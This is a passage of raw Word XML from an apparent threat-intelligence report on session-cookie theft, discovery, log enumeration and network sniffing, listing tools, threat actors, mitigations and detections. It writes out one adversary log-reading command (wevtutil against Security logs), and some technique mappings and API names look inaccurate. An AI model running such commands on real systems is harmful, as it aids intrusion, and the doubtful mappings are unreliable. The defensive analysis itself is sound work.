    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Set automountServiceAccountToken: false in Kubernetes pods.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>3) Technique: Steal Web Session Cookie (T1539)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3158">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries steal browser cookies (e.g., session IDs, OAuth tokens) to hijack authenticated web sessions. Cookies often bypass MFA and remain valid for days or weeks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F3158" w:rsidRDefault="004F3158" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="004F3158" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3158">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="004F3158" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3158">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Malicious JavaScript Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Inject scripts into compromised websites or phishing pages to harvest cookies via document.cookie. Adversaries use frameworks like Evilginx2 to proxy traffic and capture session tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: Star Blizzard deployed Evilginx2 to steal Microsoft 365 session cookies, bypassing MFA and accessing victim emails.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Hijacks SaaS applications (e.g., Salesforce, GitHub) without credential theft.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="004F3158" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3158">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Browser Process Memory Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Use malware like Raccoon Stealer to dump browser memory (e.g., Chrome Renderer processes) and extract encrypted cookies. Decryption occurs via master keys stored on disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: APT29 copied Chrome Cookies SQLite files during the SolarWinds breach, forging duo-sid cookies to bypass MFA.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Accesses cloud infrastructure (e.g., AWS Console) via authenticated sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mark cookies as HttpOnly and Secure to block JavaScript access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRDefault="007A1057" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1057">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Implement token binding to link sessions to originating devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A1057" w:rsidRPr="007A1057" w:rsidRDefault="007A1057" w:rsidP="007A1057">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F34F9E" w:rsidRPr="004F3158" w:rsidRDefault="00264887" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Discovery</w:t>
      </w:r>
      <w:r w:rsidR="00C177F6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C177F6" w:rsidRPr="00C177F6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F3158" w:rsidRDefault="00C177F6" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery encompasses techniques adversaries use to systematically explore and map compromised environments. This post-compromise phase focuses on identifying system details, network configurations, user accounts, and trust relationships to enable lateral movement, privilege escalation, and data exfiltration. Adversaries leverage built-in tools and custom scripts to gather intelligence with minimal footprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="004F3158">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>1) Technique: Log Enumeration (Inferred from T1560: Archive Collected Data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries survey system, application, or security logs to extract sensitive information (e.g., credentials, IP addresses, error messages). Logs provide insights into system operations, user activities, and potential vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures &amp; Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Windows Event Log Extraction via wevtutil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mechanism: Adversaries use the native Windows tool wevtutil to query and export event logs (e.g., Security, System). Commands like wevtutil qe Security /f:text extract login histories, account changes, or failed access attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: APT29 queried Security logs for Event ID 4624 (successful logons) to identify high-privilege accounts and their source IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Reveals privileged accounts for targeted credential theft or lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Cloud Audit Log Collection via APIs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries with stolen cloud credentials use APIs (e.g., AWS CloudTrail, Azure Monitor) to export activity logs. These logs expose IAM roles, resource accesses, and misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: Scattered Spider used AWS GetCloudTrailEvents to find S3 buckets containing sensitive data, enabling subsequent exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Impact: Identifies over-permissioned roles for privilege escalation or resource hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Monitor for unusual wevtutil usage (e.g., bulk log exports).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Alert on excessive cloud log-read API calls from non-admin users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>2) Technique: Network Sniffing (T1040)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries passively intercept network traffic to harvest credentials, configuration details, or communication patterns. This technique exploits unencrypted protocols (e.g., HTTP, Telnet) or abused cloud services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C72EA3" w:rsidRDefault="00C72EA3" w:rsidP="00C177F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidR="00C177F6" w:rsidRPr="00C72EA3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C72EA3" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C72EA3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>LLMNR/NBT-NS Poisoning with Responder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries spoof name-resolution responses (LLMNR/NBT-NS) to redirect traffic to their systems. When victims attempt network access, their authentication attempts (e.g., SMB/NTLMv2 hashes) are captured.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C177F6" w:rsidRPr="00C177F6" w:rsidRDefault="00C177F6" w:rsidP="00C72EA3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C177F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: APT28 deployed Responder to harvest hashed credentials for offline cracking, enabling lateral movement via Pass-the-Hash.</w:t>
      </w:r>
    </w:p>
